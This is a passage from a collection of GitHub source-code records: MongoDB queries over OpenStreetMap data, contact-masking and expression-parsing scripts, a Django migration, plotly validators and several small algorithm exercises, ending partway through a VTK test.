    # original, which fixes the order pairs are printed in).
    freq = {}
    for item in reversed(List):
        freq[item] = freq.get(item, 0) + 1
    for i in freq:
        if k == 0:
            # Equal elements pair with each other: C(c, 2) unordered pairs.
            c = freq[i]
            for _ in range(c * (c - 1) // 2):
                print(i, i)
        else:
            if i + k in freq:
                for m in range(freq[i]):
                    for n in range(freq[i + k]):
                        print(i, i + k)
            if i - k in freq:
                for m in range(freq[i]):
                    for n in range(freq[i - k]):
                        print(i - k, i)
        # Zero out i so each unordered pair is printed only once overall.
        freq[i] = 0
# Main
n=int(input())
l=list(int(i) for i in input().strip().split(' '))
k=int(input())
printPairDiffK(l, k)
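# --- Editor's addition (hedged sketch, not called above): for *distinct*
# values, a set gives an O(n) membership check instead of the nested
# per-occurrence loops:
def pairs_with_diff_k(values, k):
    seen = set(values)
    return sorted((x, x + k) for x in seen if x + k in seen)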
|
[
"noreply@github.com"
] |
code-drops.noreply@github.com
|
c7be3292d0f7692e0324adf082264120fa54122f
|
8c87224eb6d2935a6d10bff39f8592a1dd43f549
|
/data_overview.py
|
c5b91d99da176f1a06a9543f44356e24da0112eb
|
[] |
no_license
|
charano/data-wrangle-openstreetmaps-data_1
|
ca3024d78acaf80e85ae3c66a1eee9b72dd6c899
|
59458dff3e1b05216b259b4bcf07da32e28abb57
|
refs/heads/master
| 2021-01-10T13:28:59.052062
| 2015-06-06T16:58:10
| 2015-06-06T16:58:10
| 36,987,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,190
|
py
|
import pprint
def get_db(db_name):
from pymongo import MongoClient
client = MongoClient('localhost:27017')
db = client[db_name]
return db
def zip_pipeline():
pipeline = [{"$match" : { "address.postcode" : {"$exists":1}}}
,{"$group" : {"_id" : "$address.postcode",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def city_pipeline():
pipeline = [{"$match" : { "address.city" : {"$exists":1}}}
,{"$group" : {"_id" : "$address.city",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def school_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "school"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def college_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "college"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def university_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "university"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def top_user_pipeline():
pipeline = [{"$group" : {"_id" : "$created.user",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
,{"$limit":25}
]
return pipeline
def one_time_user_pipeline():
pipeline = [{"$group" : {"_id" : "$created.user",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
,{"$limit":1}
]
return pipeline
def top_amenities_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}}}
,{"$group" : {"_id" : "$amenity", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":100}
]
return pipeline
def top_religions_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "place_of_worship"}}
,{"$group" : {"_id" : "$religion", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def top_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":20}
]
return pipeline
def marietta_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant", "address.city" : "Marietta"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def decatur_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant", "address.city" : "Decatur"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def timestamp_pipeline():
pipeline = [{"$group" : {"_id" : {"year" : {"$year" : "$created.timestamp"}},
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def aggregate(db, pipeline):
    # Helper (unused below): run a pipeline against the same collection the
    # rest of the script queries.
    result = db.atlanta.aggregate(pipeline)
    return result
if __name__ == '__main__':
db = get_db('test')
#Number of documents
count_result = db.atlanta.find().count()
print 'Number of documents'
pprint.pprint(count_result)
#Number of nodes
nodes_result = db.atlanta.find({"type":"node"}).count()
print 'Number of nodes'
pprint.pprint(nodes_result)
#Number of ways
ways_result = db.atlanta.find({"type":"way"}).count()
print 'Number of ways'
pprint.pprint(ways_result)
#Number of unique users
users_result = len(db.atlanta.distinct("created.user"))
print 'Number of unique users'
pprint.pprint(users_result)
#Top 1 contributing user
top_user_pipeline = top_user_pipeline()
top_user_result = db.atlanta.aggregate(top_user_pipeline)
print 'Top contributor'
pprint.pprint(top_user_result)
#Zipcodes
zip_pipeline = zip_pipeline()
zip_result = db.atlanta.aggregate(zip_pipeline)
print 'Zipcodes'
pprint.pprint(zip_result)
#Cities
city_pipeline = city_pipeline()
city_result = db.atlanta.aggregate(city_pipeline)
print 'Cities'
pprint.pprint(city_result)
#Top amenities
top_amenities_pipeline = top_amenities_pipeline()
amenity_result = db.atlanta.aggregate(top_amenities_pipeline)
print 'Amenities'
pprint.pprint(amenity_result)
#Top religions
top_religions_pipeline = top_religions_pipeline()
top_religions_result = db.atlanta.aggregate(top_religions_pipeline)
print 'Top Religions'
pprint.pprint(top_religions_result)
#Top cuisines
top_cuisines_pipeline = top_cuisines_pipeline()
top_cuisines_result = db.atlanta.aggregate(top_cuisines_pipeline)
print 'Top Cuisines'
pprint.pprint(top_cuisines_result)
#Marietta cuisines
marietta_cuisines_pipeline = marietta_cuisines_pipeline()
marietta_cuisines_result = db.atlanta.aggregate(marietta_cuisines_pipeline)
print 'Marietta Cuisines'
pprint.pprint(marietta_cuisines_result)
#Decatur cuisines
decatur_cuisines_pipeline = decatur_cuisines_pipeline()
decatur_cuisines_result = db.atlanta.aggregate(decatur_cuisines_pipeline)
print 'Decatur Cuisines'
pprint.pprint(decatur_cuisines_result)
#Schools
school_pipeline = school_pipeline()
school_result = db.atlanta.aggregate(school_pipeline)
print 'Schools'
pprint.pprint(school_result)
#Colleges
college_pipeline = college_pipeline()
college_result = db.atlanta.aggregate(college_pipeline)
print 'Colleges'
pprint.pprint(college_result)
#Universities
university_pipeline = university_pipeline()
university_result = db.atlanta.aggregate(university_pipeline)
print 'Universities'
pprint.pprint(university_result)
#Number of records created every year
timestamp_pipeline = timestamp_pipeline()
timestamp_result = db.atlanta.aggregate(timestamp_pipeline)
print 'Number of records created/year'
pprint.pprint(timestamp_result)
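# --- Editor's addition (hedged): this script targets Python 2 and an older
# pymongo in which aggregate() returned a result document. On pymongo >= 3,
# aggregate() returns a CommandCursor, so results would be iterated instead:
#   for doc in db.atlanta.aggregate(zip_pipeline()):
#       pprint.pprint(doc)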
|
[
"root@ip-10-47-174-141.ec2.internal"
] |
root@ip-10-47-174-141.ec2.internal
|
934e170f6ff5c24743b86be8f724a5ba2956c4f5
|
4410498f2af839d5d086e2a57d7faadb372bba7c
|
/twitterOA1.py
|
a86365d4d0ebcfe3084d7f44847c804675e3c214
|
[] |
no_license
|
Huijuan2015/MyLeetcodeSolutions
|
264e68c4748caac9fc9a4dc3347ae8eae7241217
|
6d4d078db8f3e6994db0dc25410be265459acc04
|
refs/heads/master
| 2020-04-06T05:14:29.103116
| 2016-11-05T21:57:27
| 2016-11-05T21:57:27
| 53,628,844
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,420
|
py
|
import sys
from string import maketrans
def mask_email(email):
body = email[2:].strip()
at = body.find('@')
return 'E:' + body[0] + '*' * 5 + body[at-1:]
def mask_phone(phone):
body = phone[2:].strip()
table = maketrans('', '')
body = body.translate(table, '- ()')
# print body
if body[0] == '+':
start = '+'
body = body[1:]
mid = '-***-***-'
else:
start = ''
mid = '***-***-'
starts = '*' * (len(body) - 10)
return 'P:' + start + starts + mid + phone[-4:]
for line in sys.stdin.readlines():
line = line.strip()
if line[0] == 'E':
print mask_email(line)
else:
print mask_phone(line)
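# --- Editor's addition (hedged): sample shapes of the masking output above,
# with made-up inputs (none are given in this file):
#   E: alice@example.com  ->  E:a*****e@example.com
#   P: 333-444-5678       ->  P:***-***-5678
#   P: +1 (333) 444-5678  ->  P:+*-***-***-5678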
# --------- second, unrelated script kept in the same file ---------
import sys
from string import maketrans
def simplify(exp):
if type(exp) == list:
first = True
nlist = []
for i in xrange(len(exp)):
if type(exp[i]) == list:
if first:
nlist.extend(simplify(exp[i]))
first = False
else:
nlist.append(simplify(exp[i]))
else:
nlist.append(exp[i])
return nlist
else:
return [exp]
def reverse(exp):
if type(exp) == list:
exp = exp[::-1]
for i in xrange(len(exp)):
exp[i] = reverse(exp[i])
return exp
return exp
def parse(s):
s = s.translate(maketrans('', ''), ' ')
expstr, cmds = s.split('/')
cmds = cmds.strip()
ncmds = []
prevS = ''
for cmd in cmds:
if cmd == 'R' or (cmd == 'S' and prevS != cmd):
ncmds.append(cmd)
prevS = cmd
result = []
stack = [result]
for s in expstr:
if s == '(':
stack[-1].append([])
stack.append(stack[-1][-1])
elif s == ')':
stack.pop()
else:
stack[-1].append(s)
return result, ncmds
def extract(exp):
if type(exp) == list:
return '(' + ''.join(map(extract, exp)) + ')'
else:
return exp
# a = [
# # 'A/',
# # 'A B /S',
# # '(AB) C((DE)F)/ R',
# # '(AB) C((DE)F)/ RR',
# '(AB) C((DE)F)/ SSS',
# ]
for line in sys.stdin.readlines():
# for line in a:
exp, cmds = parse(line)
for cmd in cmds:
if cmd == 'S':
exp = simplify(exp)
else:
exp = reverse(exp)
print extract(exp)[1:-1]
|
[
"huijuan1991@hotmail.com"
] |
huijuan1991@hotmail.com
|
47a910a99248290f1384e97ff25bd0b69c23469d
|
bfee538514b48b3f83873c671e4bcaadf0744d69
|
/api/migrations/0001_initial.py
|
bd0b5cfbddd5550b74916de712000ea67229a801
|
[] |
no_license
|
visheshdubey/Dashbike
|
204d9d8411e5afdf0b176b460470a1c6608b52f1
|
5dcb7f5d449034c61ef7dcdef246fbf4209e9e15
|
refs/heads/master
| 2023-07-27T11:35:36.071871
| 2021-09-12T03:03:01
| 2021-09-12T03:03:01
| 178,920,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,175
|
py
|
# Generated by Django 2.1.7 on 2019-04-06 05:49
import api.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('Users', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Bike',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bike_name', models.CharField(default='type..', max_length=500)),
('image', models.ImageField(default='def.jpg', upload_to=api.models.scramble_uploaded_filename, verbose_name='media')),
('thumbnail', models.ImageField(blank=True, default='defthumb.jpg', upload_to='', verbose_name='Thumbnail of uploaded image')),
],
),
migrations.CreateModel(
name='BikeModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(default='type..', max_length=500)),
('count', models.IntegerField(default=0)),
('bike_rate_hr', models.CharField(blank=True, max_length=500, null=True)),
('bike_rate_h', models.CharField(blank=True, max_length=500, null=True)),
('bike_rate_f', models.CharField(blank=True, max_length=500, null=True)),
('bike_isAvailable', models.BooleanField(default=True)),
('isActive', models.BooleanField(default=True)),
('bike_model', models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='api.Bike')),
('dealer', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.DealerDetail')),
],
),
migrations.CreateModel(
name='Booking',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pickup_time', models.DateTimeField(default=None)),
('dob', models.DateTimeField(default=None)),
('duration', models.CharField(default=0.0, max_length=500)),
('transaction_amt', models.CharField(default=0.0, max_length=500)),
('ord_id', models.CharField(default=0.0, max_length=500)),
('transaction_id', models.CharField(default=0.0, max_length=500)),
('is_accepted', models.BooleanField(default=False)),
('is_cancelled', models.BooleanField(default=False)),
('is_Booked', models.BooleanField(default=False)),
('bike_model', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='api.BikeModel')),
('client', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.ClientDetail')),
('dealer', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.DealerDetail')),
],
),
]
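# --- Editor's addition (hedged): a migration like this is applied with
#   python manage.py migrate api
# assuming this module lives in an app labelled "api", consistent with the
# "api/migrations/0001_initial.py" path above.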
|
[
"you@example.com"
] |
you@example.com
|
5740cc781e591bcf9a64ae8aec6619af8f1be9d9
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/plotly/py2/plotly/validators/sankey/node/hoverlabel/__init__.py
|
97dbaf78fea9dc475698f08381ca03fa4d8e4827
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 6,073
|
py
|
import _plotly_utils.basevalidators
class NamelengthsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self,
plotly_name="namelengthsrc",
parent_name="sankey.node.hoverlabel",
**kwargs
):
super(NamelengthsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class NamelengthValidator(_plotly_utils.basevalidators.IntegerValidator):
def __init__(
self, plotly_name="namelength", parent_name="sankey.node.hoverlabel", **kwargs
):
super(NamelengthValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", -1),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class FontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="font", parent_name="sankey.node.hoverlabel", **kwargs
):
super(FontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Font"),
data_docs=kwargs.pop(
"data_docs",
"""
color
colorsrc
Sets the source reference on Chart Studio Cloud
for color .
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
            supported. These include "Arial", "Balto",
            "Courier New", "Droid Sans", "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for family .
size
sizesrc
Sets the source reference on Chart Studio Cloud
for size .
""",
),
**kwargs
)
import _plotly_utils.basevalidators
class BordercolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self,
plotly_name="bordercolorsrc",
parent_name="sankey.node.hoverlabel",
**kwargs
):
super(BordercolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class BgcolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="bgcolorsrc", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BgcolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class BgcolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bgcolor", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BgcolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class AlignsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="alignsrc", parent_name="sankey.node.hoverlabel", **kwargs
):
super(AlignsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class AlignValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="align", parent_name="sankey.node.hoverlabel", **kwargs
):
super(AlignValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
values=kwargs.pop("values", ["left", "right", "auto"]),
**kwargs
)
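
# --- Editor's usage sketch (not part of the generated module) ---
# Validators built on _plotly_utils.basevalidators expose validate_coerce(),
# which returns the value when it is acceptable for the property and raises
# ValueError otherwise. For the enumerated validator above, roughly:
#
#     v = AlignValidator()
#     v.validate_coerce("left")    # -> "left"
#     v.validate_coerce("center")  # ValueError: not one of left/right/auto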
|
[
"robot-piglet@yandex-team.com"
] |
robot-piglet@yandex-team.com
|
6f1688c722ecdbc98b0e43a88f1b44403696a034
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/49/usersdata/91/18060/submittedfiles/pico.py
|
24ae75a9ef09d94bf4615d5fc052c73af71e91f6
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 573
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
def pico(lista):
    # Index where the list first stops increasing (the candidate peak).
    posicao = 0
    for i in range(0, len(lista) - 1, 1):
        if lista[i] > lista[i + 1]:
            posicao = i
            break
    # After the peak, the values must never increase again.
    cont = 0
    for i in range(posicao, len(lista) - 1, 1):
        if lista[i] < lista[i + 1]:
            cont += 1
    # A peak requires at least one rise before the descent (posicao != 0).
    if cont == 0 and posicao != 0:
        return True
    else:
        return False
n = int(input('Enter the number of elements in the list: '))
a = []
for i in range(0, n, 1):
    a.append(int(input('Enter a value: ')))
if pico(a):
    print('S')
else:
    print('N')
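
# Worked example: the list 1 2 5 3 2 rises to 5 and then only falls, so the
# script prints 'S'; the list 1 2 3 never falls, so it prints 'N'.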
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
993a6ea2459e638208fb80cbeb1277f085d2f971
|
6a433931dd544e2d9f2b18cff3ce096531b15941
|
/for_loop_sum.py
|
0e496fc2e9d34c9c258fd6d3f0dd3dbb769d5d3d
|
[] |
no_license
|
lunatic-7/python_course_noob-git-
|
b7de1d988c91fd017b645fb1e227e207f3b12b15
|
5e06442151e7a94449ce99158855a608eb035319
|
refs/heads/main
| 2023-08-04T06:55:05.473812
| 2021-09-18T17:20:49
| 2021-09-18T17:20:49
| 407,922,569
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
# sum from 1 to 10
# 1 + 2 + 3 + ............. 10
# total = 0
# for i in range(1,11):
# total += i
# print(total)
# take input from user.
n = int(input("enter a number : "))
total = 0
for i in range(1,n+1):
total += i
print(total)
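
# Editor's note: for the non-negative n this script expects, the sum has the
# closed form n * (n + 1) // 2 (Gauss), so the loop could be replaced by it:
assert total == n * (n + 1) // 2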
|
[
"wasif1607@gmail.com"
] |
wasif1607@gmail.com
|
944943ff2bf8b9572fd17ce34f32c985818858d4
|
69b93223fc6794123269022a02e5a1dcf130e698
|
/81_Search_in_Rotated_Sorted_Array_II.py
|
880660e9f25e4a6c94f1ec6ef80ea37cb6c242c8
|
[] |
no_license
|
GuangyuZheng/leet_code_python
|
43b984ce98cc889a7e07151004d347cb03b2d9b2
|
266def94df8245f90ea5b6885fc472470b189e51
|
refs/heads/master
| 2020-09-05T18:12:07.649374
| 2020-02-22T09:37:59
| 2020-02-22T09:37:59
| 220,177,486
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 780
|
py
|
from typing import List
class Solution:
def search(self, nums: List[int], target: int) -> bool:
n = len(nums)
start, end = 0, n-1
while start <= end:
mid = (start + end)//2
if nums[mid] == target:
return True
if nums[start] == nums[mid] == nums[end]:
start += 1
end -= 1
continue
if nums[start] <= nums[mid]:
if nums[start] <= target < nums[mid]:
end = mid - 1
else:
start = mid + 1
else:
if nums[mid] < target <= nums[end]:
start = mid + 1
else:
end = mid - 1
return False
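

if __name__ == "__main__":
    # Quick check with the classic LeetCode 81 example.
    s = Solution()
    print(s.search([2, 5, 6, 0, 0, 1, 2], 0))  # True
    print(s.search([2, 5, 6, 0, 0, 1, 2], 3))  # False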
|
[
"583621555@qq.com"
] |
583621555@qq.com
|
37ff904c75ff61fe30e0c84cb5bae9b4da25e2d2
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_207/445.py
|
20b1c67b3718d34b8de06cbe25dcb0f54c5ccc12
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
def get_result(R, O, Y, G, B, V):
assert O == 0
assert G == 0
assert V == 0
max_cnt = max(R, Y, B)
if Y + B < max_cnt or R + B < max_cnt or R + Y < max_cnt:
return "IMPOSSIBLE"
cnts = [(R, "R"), (B, "B"), (Y, "Y")]
cnts = sorted(cnts, key=lambda x:x[0], reverse=True)
s = [""] * (3 * max_cnt)
for i in range(cnts[0][0]):
s[3 * i] = cnts[0][1]
for i in range(cnts[1][0]):
s[3 * i + 1] = cnts[1][1]
for i in range(cnts[2][0]):
s[3 * max_cnt - 1 - 3 * i] = cnts[2][1]
return "".join(s)
num_tests = int(input())
for test_id in range(1, num_tests + 1):
N, R, O, Y, G, B, V = map(int, input().strip().split())
res = get_result(R, O, Y, G, B, V)
print("Case #{0}: {1}".format(test_id, res))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
d53dfb47d2536f19b23f7013ea42ec26c225353e
|
3ff660941132bcaed5bfe309861843bd6657ee37
|
/Trees/Print right side.py
|
b8760b5988ef7e07e1d95586be794cfaa5781333
|
[] |
no_license
|
mrunalhirve12/Interviews2
|
04295cebe1946de1f310857d7fbded11a02f8eb1
|
c48bd0a4e1112804da8bdf2d7e43ab0f2ef00469
|
refs/heads/master
| 2023-03-26T14:35:06.029701
| 2021-03-25T21:31:46
| 2021-03-25T21:31:46
| 351,593,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,497
|
py
|
"""
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
Example:
Input: [1,2,3,null,5,null,4]
Output: [1, 3, 4]
Explanation:
1 <---
/ \
2 3 <---
\ \
5 4 <---
"""
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def rightSideView(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
# res list
res = []
        # Run DFS from the root at level 0, collecting one value per level in res.
self.dfs(root, 0, res)
# return res
return res
def dfs(self, root, level, res):
# if not root return empty
if not root:
return
        # Append only the first node reached at each level; the right subtree
        # is visited first, so that node is the rightmost one.
if len(res) == level:
res.append(root.val)
        # Recurse into the right subtree before the left, incrementing the level.
self.dfs(root.right, level + 1, res)
self.dfs(root.left, level + 1, res)
# Driver program to test above function
# Construct a small sample tree and print its right-side view.
root = TreeNode(3)
root.left = TreeNode(9)
root.right = TreeNode(20)
root.left.left = TreeNode(15)
s = Solution()
print(s.rightSideView(root))
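
# Expected output: [3, 20, 15] -- 15 is visible from the right because no
# node sits to its right on the bottom level.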
|
[
"mrunalhirve@gmail.com"
] |
mrunalhirve@gmail.com
|
1bd8bc7fe24bf5d53d09e0a91e38a3bc344e4337
|
77b16dcd465b497c22cf3c096fa5c7d887d9b0c2
|
/Quintana_Jerrod/Assignments/python_fundamentals/coin_tosses.py
|
454a5cb05d4307c7ee2e66f1826a9f9c91709234
|
[
"MIT"
] |
permissive
|
curest0x1021/Python-Django-Web
|
a7cf8a45e0b924ce23791c18f6a6fb3732c36322
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
refs/heads/master
| 2020-04-26T17:14:20.277967
| 2016-10-18T21:54:39
| 2016-10-18T21:54:39
| 173,706,702
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 394
|
py
|
import random

head = 0
tail = 0
for element in range (1, 5001):
toss = round(random.random())
if (toss == 1):
head += 1
toss_text='head'
else:
tail += 1
toss_text = 'tail'
print "Attempt #{}: Throwing a coin... It's a {}! ... Got {} head(s) so far and {} tail(s) so far".format(element,toss_text,head,tail)
print 'Ending the program, thank you!'
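
# Sanity check: 5000 fair tosses give binomial counts with mean 2500 and
# standard deviation sqrt(5000 * 0.25) ~= 35, so the head/tail totals should
# land within roughly 2400-2600 on almost every run.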
|
[
"43941751+curest0x1021@users.noreply.github.com"
] |
43941751+curest0x1021@users.noreply.github.com
|
5d1e945d40520440e25f880459d35743a8ad7393
|
77c518b87e67e9926d130f856a7edb12302596eb
|
/Filters/Core/Testing/Python/MassProperties.py
|
3753d7e93c51cd9108d83665ac7f0756038d055d
|
[
"BSD-3-Clause"
] |
permissive
|
t3dbrida/VTK
|
73e308baa1e779f208421a728a4a15fec5c4f591
|
e944bac3ba12295278dcbfa5d1cd7e71d6457bef
|
refs/heads/master
| 2023-08-31T21:01:58.375533
| 2019-09-23T06:43:00
| 2019-09-23T06:43:00
| 139,547,456
| 2
| 0
|
NOASSERTION
| 2019-11-22T14:46:48
| 2018-07-03T07:49:14
|
C++
|
UTF-8
|
Python
| false
| false
| 4,779
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
=========================================================================
Program: Visualization Toolkit
Module: TestNamedColorsIntegration.py
Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================
'''
import StringIO
import sys
import vtk
import vtk.test.Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class MassProperties(vtk.test.Testing.vtkTest):
def testMassProperties(self):
# Create the RenderWindow, Renderer and both Actors
#
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
cone = vtk.vtkConeSource()
cone.SetResolution(50)
sphere = vtk.vtkSphereSource()
sphere.SetPhiResolution(50)
sphere.SetThetaResolution(50)
cube = vtk.vtkCubeSource()
cube.SetXLength(1)
cube.SetYLength(1)
cube.SetZLength(1)
sphereMapper = vtk.vtkPolyDataMapper()
sphereMapper.SetInputConnection(sphere.GetOutputPort())
sphereActor = vtk.vtkActor()
sphereActor.SetMapper(sphereMapper)
sphereActor.GetProperty().SetDiffuseColor(1, .2, .4)
coneMapper = vtk.vtkPolyDataMapper()
coneMapper.SetInputConnection(cone.GetOutputPort())
coneActor = vtk.vtkActor()
coneActor.SetMapper(coneMapper)
coneActor.GetProperty().SetDiffuseColor(.2, .4, 1)
cubeMapper = vtk.vtkPolyDataMapper()
cubeMapper.SetInputConnection(cube.GetOutputPort())
cubeActor = vtk.vtkActor()
cubeActor.SetMapper(cubeMapper)
cubeActor.GetProperty().SetDiffuseColor(.2, 1, .4)
#Add the actors to the renderer, set the background and size
#
sphereActor.SetPosition(-5, 0, 0)
ren.AddActor(sphereActor)
        coneActor.SetPosition(0, 0, 0)
        ren.AddActor(coneActor)
        # Note: the second SetPosition call moves the cone to x=5; the cube is
